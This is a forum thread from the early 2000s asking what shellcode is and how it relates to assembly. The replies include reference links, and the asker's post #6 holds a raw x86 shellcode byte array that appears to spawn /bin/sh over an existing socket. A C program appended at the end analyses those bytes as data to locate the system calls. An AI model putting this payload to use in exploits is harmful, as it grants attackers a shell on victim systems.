Shellcode

Thread: Shellcode

  1. #1
    Member
    Join Date
    Jul 2002
    Posts
    65

    Question Shellcode

    I've noticed that a lot of exploits use shellcode to execute code as the UID of the server/program. Could someone please explain or give some references as to what shellcode is and how it works? What is the relationship between shellcode and assembly? Any info on the topic would be appreciated, thanks.

    --Sudo

  2. #2
    Member
    Join Date
    Jul 2002
    Posts
    50
    When you say shell code you mean shell scripting?

    Shell scripting in Unix is like writing batch files in Windows but much more useful. It would be useful to read the shell man page (e.g. if you are using bash then type "man bash").
    I don't see any relationships between assembly and shell scripting.
    I recommend that you read http://www.tldp.org/LDP/abs/html/.
    Give man a fish and he will ask for more.
    Teach man to fish and he will never ask again.
    "Chinese proverb"

  3. #3
    Junior Member
    Join Date
    Jul 2002
    Posts
    20
    Well, just a search on Google will give you these results:

    http://www.shellcode.com.ar/docz/bof...efmt-howto.txt
    http://www.phrack.com/show.php?p=57&a=5 (WRITING SHELLCODE FOR IA-64)
    http://www.w00w00.org/files/shellcode/ ( Index of /files/shellcode )
    http://www24.brinkster.com/neolabs/p...shellcode.html (Programming a shellcode in SCO)
    and etc...

    I hope this wouldn't be used for illegal activities.

  4. #4
    Senior Member
    Join Date
    Aug 2001
    Posts
    259
    Assembly is a programming language, some might say it's THE programming language, it's about as close to the machine as you can get without using 1's and 0's. Shell scripts are just scripts that are interpreted by the shell you are using. Shell scripts are great for automating tasks on a *nix box and interfacing with Perl.
    Alternate realities celebrate reality. If you can't handle the reality you're in, then you won't be able to handle the one you're attempting to escape to.

  5. #5
    Senior Member
    Join Date
    Jun 2002
    Posts
    165
    I don't know how much detail you are looking for, this article may be of service at a very low level for your last question:

    http://droby10.addr.com/tutorial/bof/appendage1.html
    -droby10

  6. #6
    Member
    Join Date
    Jul 2002
    Posts
    65
    When you say shell code you mean shell scripting?
    No, when I say shellcode, I do not mean shell scripting. Here is an example of some shellcode:

    char shellcode[] =
    "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
    "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
    "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
    "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
    "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
    "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
    "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
    "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
    "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

    Thanks for the links Droby and Cicatrix. It looks like some heavy stuff.

    Originally posted here by Cicatrix
    I hope this wouldn't be used for illegal activities.
    No no no... I am just a VERY curious guy.. Thanks.


    --Sudo
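
On the question of how shellcode relates to assembly: the following added example (not part of any post in this thread) treats the byte array from post #6 purely as data and locates each `mov eax, imm32` / `int 0x80` pair, showing that the "string" is a sequence of encoded x86 instructions. The names `sample`, `syscall_site` and `find_syscall_sites` are hypothetical, and the fixed byte-pattern match is a triage heuristic, not a disassembler.

```c
#include <stdint.h>
#include <stdio.h>

/* Bytes copied unchanged from post #6; read as data only, never executed. */
static const unsigned char sample[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

/* One hit: offset of the `int 0x80` opcode and the value loaded into EAX. */
struct syscall_site { size_t offset; uint32_t eax; };

/* Find `mov eax, imm32` (B8 + 4 little-endian bytes) immediately followed
 * by `int 0x80` (CD 80). Returns the number of sites found; at most `max`
 * of them are stored in `out`. */
size_t find_syscall_sites(const unsigned char *buf, size_t len,
                          struct syscall_site *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 7 <= len; i++) {
        if (buf[i] != 0xb8 || buf[i + 5] != 0xcd || buf[i + 6] != 0x80)
            continue;
        if (n < max) {
            out[n].offset = i + 5;
            out[n].eax = (uint32_t)buf[i + 1] | (uint32_t)buf[i + 2] << 8 |
                         (uint32_t)buf[i + 3] << 16 | (uint32_t)buf[i + 4] << 24;
        }
        n++;
    }
    return n;
}

int main(void)
{
    struct syscall_site s[8];
    size_t n = find_syscall_sites(sample, sizeof sample - 1, s, 8);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("offset %3zu: mov eax, 0x%02x ; int 0x80\n",
               s[i].offset, (unsigned)s[i].eax);
    return 0;
}
```

The EAX value at each site is a system call number; which call it names depends on the target operating system's syscall table, which the post does not state.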
